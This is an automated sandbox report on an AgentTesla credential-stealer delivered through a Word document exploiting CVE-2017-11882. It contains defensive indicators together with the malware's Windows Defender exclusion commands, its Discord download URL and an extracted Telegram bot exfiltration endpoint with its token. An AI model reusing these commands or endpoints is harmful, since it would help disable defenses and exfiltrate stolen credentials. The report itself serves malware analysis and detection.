Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Order Confirmation.doc

Overview

General Information

Sample Name:Order Confirmation.doc
Analysis ID:425828
MD5:afb651b6577eb5a0b605f1cf56e807cc
SHA1:102cd8cc2da158ce562287af707c1da088e92025
SHA256:0187fc0bc8addf4a9dcaf818471743ff9f75d531d341863c74af74f95b3c29f0
Tags:doc
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Powershell adding suspicious path to exclusion list
Yara detected AgentTesla
Yara detected AgentTesla
Adds a directory exclusion to Windows Defender
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Drops PE files to the startup folder
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to delay execution (extensive OutputDebugStringW loop)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses the Telegram API (likely for C&C communication)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Non Interactive PowerShell
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1976 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1984 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • srt.exe (PID: 1696 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
      • powershell.exe (PID: 2584 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2408 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2928 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (PID: 2900 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
        • powershell.exe (PID: 1836 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2360 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2792 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
        • powershell.exe (PID: 2516 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 3060 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 2260 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • powershell.exe (PID: 1428 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • srt.exe (PID: 3016 cmdline: C:\Users\user\AppData\Roaming\srt.exe MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
  • 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe (PID: 1888 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
    • powershell.exe (PID: 2152 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2084 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2252 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • powershell.exe (PID: 2884 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
  • svchost.exe (PID: 2420 cmdline: 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
  • svchost.exe (PID: 1840 cmdline: 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' MD5: 9CDE4342C81458316E29CCBDA9B5A8E6)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/sendDocument"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000C.00000002.2199429971.0000000004283000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000018.00000002.2354462917.00000000025FB000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            31.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              31.2.69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe.400000.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                3.2.srt.exe.41c8660.9.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.2.srt.exe.41c8660.9.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    24.2.srt.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 14 entries

                      Sigma Overview

                      Exploits:

                      barindex
                      Sigma detected: EQNEDT32.EXE connecting to internetShow sources
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.159.130.233, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1984, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                      Sigma detected: File Dropped By EQNEDT32EXEShow sources
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1984, TargetFilename: C:\Users\user\AppData\Roaming\srt.exe

                      System Summary:

                      barindex
                      Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\srt.exe, CommandLine: C:\Users\user\AppData\Roaming\srt.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\srt.exe, NewProcessName: C:\Users\user\AppData\Roaming\srt.exe, OriginalFileName: C:\Users\user\AppData\Roaming\srt.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1984, ProcessCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ProcessId: 1696
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ParentImage: C:\Users\user\AppData\Roaming\srt.exe, ParentProcessId: 1696, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force, ProcessId: 2584

                      Malware Analysis System Evasion:

                      barindex
                      Sigma detected: Powershell adding suspicious path to exclusion listShow sources
                      Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\srt.exe, ParentImage: C:\Users\user\AppData\Roaming\srt.exe, ParentProcessId: 1696, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force, ProcessId: 2408

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000018.00000002.2354156533.0000000002511000.00000004.00000001.sdmpMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/sendDocument"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Order Confirmation.docVirustotal: Detection: 25%Perma Link
                      Source: Order Confirmation.docReversingLabs: Detection: 34%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\srt.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exeJoe Sandbox ML: detected

                      Exploits:

                      barindex
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\srt.exeJump to behavior
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49167 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49170 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49171 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49173 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49174 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49175 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49177 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49178 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49179 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49180 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49182 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49183 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49184 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49185 version: TLS 1.2
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2113313846.000000000569D000.00000004.00000001.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbV source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdbB source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2102864074.0000000002B00000.00000002.00000001.sdmp, powershell.exe, 0000000D.00000002.2158336320.00000000053A0000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2102411814.00000000029E6000.00000004.00000040.sdmp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: number of queries: 2004
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\srt.exeFile opened: C:\Users\user\Jump to behavior
                      Source: global trafficDNS query: name: cdn.discordapp.com
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 162.159.130.233:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 162.159.130.233:80

                      Networking:

                      barindex
                      Uses the Telegram API (likely for C&C communication)Show sources
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: unknownDNS query: name: api.telegram.org
                      Source: global trafficHTTP traffic detected: GET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1Connection: Keep-AliveHost: cdn.discordapp.com
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                      Source: Joe Sandbox ViewIP Address: 162.159.130.233 162.159.130.233
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                      Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49166 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65E8223-1CF8-4E74-AA78-05F4F57053A0}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /attachments/843685789120331799/847476783744811018/OtI.exe HTTP/1.1Connection: Keep-AliveHost: cdn.discordapp.com
                      Source: srt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
                      Source: srt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                      Source: srt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                      Source: srt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                      Source: srt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                      Source: srt.exe, 00000003.00000002.2223391097.00000000077F0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2099924989.0000000002440000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                      Source: srt.exe, 00000003.00000002.2222985178.00000000067F1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: srt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                      Source: srt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                      Source: srt.exe, 00000003.00000002.2223391097.00000000077F0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2099924989.0000000002440000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                      Source: srt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                      Source: srt.exe, 00000003.00000002.2243682262.00000000081B7000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2107607698.0000000002E07000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                      Source: srt.exe, 00000003.00000002.2243284497.0000000007FD0000.00000002.00000001.sdmp, powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                      Source: powershell.exe, 00000004.00000003.2094056276.0000000000629000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2097646748.000000000037C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
                      Source: powershell.exe, 00000004.00000003.2094056276.0000000000629000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2097646748.000000000037C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
                      Source: powershell.exe, 00000004.00000002.2103261007.0000000002C20000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
                      Source: srt.exe, 00000003.00000002.2186618361.0000000004183000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot1870790471:AAFpD5zuAlCeqAqJnBFTcvC5WkaPoWtoQ9c/
                      Source: srt.exe, 00000003.00000002.2186618361.0000000004183000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49185 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49185
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49184
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49184 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49177
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
